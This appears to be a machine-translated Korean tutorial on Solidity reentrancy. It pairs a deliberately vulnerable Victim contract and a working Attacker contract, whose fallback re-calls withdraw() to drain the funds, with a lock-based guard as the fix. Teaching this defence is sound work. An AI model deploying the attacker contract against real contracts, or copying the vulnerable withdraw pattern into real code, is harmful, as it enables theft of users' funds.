재입국
11875 단어 soliditysecuritybestpractice
예제를 통해 이 공격을 이해해 봅시다.
여러 사람으로부터 받은 eth를 저장하고 그들이 다시 인출할 수 있도록 하는 피해자 계약을 고려하십시오.
contract Victim{
mapping(address => uint) public balances;
receive() external payable{
}
function deposit() external payable {
balances[msg.sender] += msg.value;
}
function withdraw() external {
uint bal = balances[msg.sender];
require(bal > 0, "Your acc balance zero!");
(bool sent,) = msg.sender.call{value: bal}("");
require(sent == true, "Send failed");
balances[msg.sender] =0;
}
function getBalance() public view returns(uint) {
return address(this).balance;
}
}
이제 이것이 피해자 계약에서 모든 자금을 훔치기 위해 공격을 받을 수 있는 방법을 이해합시다.
withdraw()
함수에서 다음 줄이 실행될 때 공격자에서 fallback
를 트리거합니다. 그러면 이전withdraw
이 완전히 실행되기 전에 withdraw()
가 다시 호출됩니다. 이 주기는 피해자 계약의 자금이 고갈될 때까지 계속됩니다(bool sent,) = msg.sender.call{value: bal}("");
balances[msg.sender] =0;
의 withdraw()
가 여러 번의 withdraw
호출로 인해 실행되지 않기 때문에 발생합니다. 따라서 공격자 계약 주소 균형은 절대 변경되지 않으며 요구 조건은 항상 withdraw()
함수의 주기로 전달됩니다. 휴, 말이 많다. 더 잘 이해하기 위해 공격자 계약을 살펴보겠습니다.
interface IVictim {
function deposit() external payable;
function withdraw() external;
}
contract Attacker {
IVictim public victimContract;
constructor(address _victimContract) {
victimContract = IVictim(_victimContract);
}
fallback() external payable {
if (address(victimContract).balance > 0) {
victimContract.withdraw();
}
}
function attack() external payable {
require(msg.value >= 1 ether, "< 1 ETH");
victimContract.deposit{value: 1 ether}();
victimContract.withdraw();
}
function getBalance() public view returns(uint) {
return address(this).balance;
}
}
위의 내용을 이해했다면(내가 잘 전달했다면) 공격자를 막을 수 있는 솔루션을 제시할 수 있을 것입니다. 그렇지 않은 경우 걱정하지 마세요. 계약서를 따르면 더 잘 이해하는 데 도움이 됩니다.
contract VictimGaurded{
mapping(address => uint) public balances;
bool internal lock;
modifier ReentrancyGaurd() {
require(!lock, "Bad luck Attacker!");
lock = true;
_;
lock = false;
}
receive() external payable{
}
function deposit() external payable {
balances[msg.sender] += msg.value;
}
function withdraw() external ReentrancyGaurd {
uint bal = balances[msg.sender];
require(bal > 0, "Your acc balance zero!");
(bool sent,) = msg.sender.call{value: bal}("");
require(sent == true, "Send failed");
balances[msg.sender] =0;
}
function getBalance() public view returns(uint) {
return address(this).balance;
}
}
기본 아이디어는 이전 호출이 완전히 실행되지 않으면 두 번째 함수 호출이 실패하도록 조건을 설정하는 것입니다.
더 간단한 방법도 있습니다.
withdraw()
함수에서 eth를 보내기 전에 잔액을 업데이트하면 재진입이 실패합니다.
Reference
이 문제에 관하여(재입국), 우리는 이곳에서 더 많은 자료를 발견하고 링크를 클릭하여 보았다 https://dev.to/rushanksavant/re-entrancy-44m9텍스트를 자유롭게 공유하거나 복사할 수 있습니다.하지만 이 문서의 URL은 참조 URL로 남겨 두십시오.
우수한 개발자 콘텐츠 발견에 전념 (Collection and Share based on the CC Protocol.)